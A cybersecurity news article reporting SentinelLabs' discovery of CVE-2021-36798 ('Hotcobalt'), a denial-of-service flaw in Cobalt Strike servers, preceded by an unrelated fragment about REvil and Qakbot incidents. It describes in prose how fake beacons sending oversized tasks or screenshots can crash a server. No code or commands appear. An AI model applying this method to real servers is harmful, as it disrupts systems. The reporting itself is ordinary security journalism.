In the first event, Secureworks incident responders helped the victim recover from a REvil ransomware attack. In the second incident, Secureworks Taegis™ XDR countermeasures detected and alerted the malicious Qakbot and Cobalt Strike activity into the system that enabled network protectors to mitigate the intrusion before the ransomware was deployed. However, the presence of illegal Cobalt Strike versions on the dark web gives chances to threat actors to misuse it.

Latest Cobalt Strike Vulnerability Allows Takedown of Hacker Servers

 

Cybersecurity experts have found Cobalt Strike (DoS) exploit that allows Beacon blocking C2 (Command and Control) communication deployments and new channels. Cobalt Strike is a genuine penetration testing tool built to work as an attack framework by red teams. Red team is a group of cybersecurity analysts that work as threat actors to attack their own organization's to find security vulnerabilities and exploits. But, Cobalt Strike is also used by hackers, that generally use it for post-hacking tasks after planting the beacons, which allows them unlimited remote access to hacked devices. With the help of these beacons, the threat actors can later use the compromised servers to deploy second-stage malware payloads or harvest data. 

The cybersecurity team at SentinelOne, SentinelLabs found about the DoS vulnerabilities, termed as CVE-2021-36798 and called "Hotcobalt" in the most recent versions of the Cobalt Strike server. SentinelLabs reports "when a Beacon stager runs, it gathers information about the computer it is running on (CPU architecture, keyboard layout, internal IP, etc.), encrypts that info using the public key, and sends it to the server in an HTTP GET request. Receiving tasks generally happens over HTTP GET requests and the Beacon replies with the task data over HTTP POST requests. Tasks are encrypted using an AES key sent by the Beacon in the registration request." 

The research revealed that one can plant fake beacons with a particular Cobalt Strike server installations by giving out fake tasks or screenshots with high file sizes to the server. The hacker could crash the server and exhaust available memory using the help of this process. The crashed server renders pre-installed beacons, not being able to communicate with the C2 servers, it restricts new beacons from getting installed on compromised systems. 

Besides this, it also interferes with the red team and malicious attacks which used the planted beacons. "One of the most famous features of Cobalt Strike is its Malleable C2. In short, this feature lets the attacker encode (“transform” in Cobalt’s language) all the beacon’s HTTP communications. The entire process described above is wrapped in the chosen Malleable profile’s transformation steps, which are also embedded in the stager itself," said SentinelLabs in its blog.